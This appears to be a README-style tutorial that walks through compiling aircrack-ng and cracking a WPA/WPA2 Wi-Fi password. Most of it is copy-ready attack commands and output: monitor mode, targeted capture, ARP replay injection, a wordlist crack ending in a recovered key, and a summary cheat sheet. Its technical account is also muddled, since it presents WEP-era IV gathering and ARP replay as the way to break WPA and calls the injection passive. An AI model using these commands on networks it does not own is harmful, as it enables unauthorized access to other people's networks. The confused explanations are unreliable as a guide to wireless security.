Aircrack-ng is basically a network software suite that has been crafted to achieve the following objectives:
Note that the present tutorial is not an exhaustive guide, rather it is intended to build some basic skills to test your own network's security and get familiar with the concepts.
The attack outlined below is based on a passive technique (ARP request replay attack) and it focuses on debian-based distributions assuming you have a working wireless card with drivers already patched for injection.
Aircrack-ng can be installed on a debian-based operating system by compiling the source code (for more details you can visit the official website).
Below you can find instructions for installing the basic requirements to build aircrack-ng for Debian-based operating systems.
$ sudo apt install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils
Get the latest copy of aircrack-ng:
$ git clone https://github.com/aircrack-ng/aircrack-ng
$ cd aircrack-ng
To build aircrack-ng, the Autotools build system is used.
First, ./configure
the project for building with the appropriate options:
$ autoreconf -i
$ ./configure --with-experimental
Next, compile the project with the make
command and use the "installing" target from the additional targets listed below to complete the installation.
make check
make integration
make install
make uninstall
The purpose of this step ensures that your card successfully supports injection.
Assuming your interface name is "wlan0" (you can retrieve it typing iwconfig
on the terminal), type the following command:
# aireplay-ng --test wlan0
The system responds:
18:10:59 wlan0 channel: 10
18:10:59 Trying broadcast probe requests...
18:10:59 Injection is working!
18:11:00 Found 1 AP
...
This confirms your card can inject packets.
The first thing to do is looking out for a potential target putting your wireless card into monitor mode using airmon-ng
. However, it is strongly recommended to kill
all interfering processes prior to using the aircrack-ng suite.
# airmon-ng check kill
Killing these processes:
PID Name
870 dhclient
1115 wpa_supplicant
Then, it is possible to enable the monitor mode used to create another interface (mon0):
# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9485
(monitor mode enabled for [phy0]wlan0 on [phy0]mon0)
You will notice that "wlan0" has successfully been put into monitor mode.
Then, start airodump-ng
to look out for networks:
# airodump-ng mon0
Locate the wireless network you want to crack, and note its BSSID and channel from the following output:
CH 10 ][ Elapsed: 36 s][2019-05-15 18:15
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
...
Note that the top part of the output lists information about APs in range, and the bottom part lists clients connected to the corresponding APs.
Open another console session to capture the initial vectors generated by the target and to save the result into a file:
# airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
where -c 10
is the channel for the wireless network, --bssid 08:00:BF:E6:31:2E
is the MAC address of the AP, -w output-file
defines the output files that will contain the initialization vectors, and mon0
is the interface name.
The system responds:
CH 10 ][ Elapsed: 12 s][2019-05-15 18:16
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
BSSID STATION PWR Lost Packets Probes
08:00:BF:E6:31:2E 00:0F:35:51:AC:22 -21 0 183782
After the execution of the command various files will be generated.
The classic ARP request replay attack is the most effective way to generate new initialization vectors, and works very reliably. The purpose of this step is to start aireplay-ng
in a mode which listens for ARP requests then reinjects them back to the access point.
Keep your airodump-ng
and aireplay-ng
running, open another terminal and run the ARP request replay attack:
# aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 618643 packets (got 304896 ARP requests), sent 194947 packets...
You can check if the packets are injected by looking at the airodump-ng
screen.
At this point, you should be able to obtain the WPA key from the initialization vectors gathered in the previous steps. To perform this attack you need a wordlist and if the network password is not in the wordfile you will not crack the password. Note that most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the WPA-length password lists.
Open another console session and type:
# aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap
where -a2
specifies the attack mode for WPA/WPA2-PSK, -w wordlist.txt
refers to your own dictionary wordlist, and output*.cap
selects all output files with .cap
extension.
This is the output of a successful attack:
Aircrack-ng 1.5.2
[00:00:00] 192/1229 keys tested (520.04 k/s)
Time left: 0 seconds 15.62%
KEY FOUND! [ notsecure ]
Master Key : 42 28 5E 5A 73 33 90 E9 34 CC A6 C3 B1 CE 97 CA
06 10 96 05 CC 13 FC 53 B0 61 5C 19 45 9A CE 63
Transient Key : 86 D0 43 C9 AA 47 F8 03 2F 71 3F 53 D6 65 F3 F3
86 36 52 0F 48 1E 57 4A 10 F8 B6 A0 78 30 22 1E
4E 77 F0 5E 1F FC 73 69 CA 35 5B 54 4D B0 EC 1A
90 FE D0 B9 33 06 60 F9 33 4B CF 30 B4 A8 AE 3A
EAPOL HMAC : 8E 52 1B 51 E8 F2 7E ED 95 F4 CF D2 C6 D0 F0 68
Below you can find the list of all of the commands needed to crack a WPA/WPA2 network.
# kill all interfering processes prior to using the aircrack-ng
airmon-ng check kill
# put your network device into monitor mode
airmon-ng start wlan0
# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0
# start listening for the handshake on a new console session
airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
# start the ARP request replay attack
aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
# run aircrack-ng to obtain the WPA key
aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap
This project is licensed under the MIT License - see the LICENSE file for details.
This tutorial has been made for educational purposes only, I don't promote malicious practices and I will not be responsible for any illegal activities.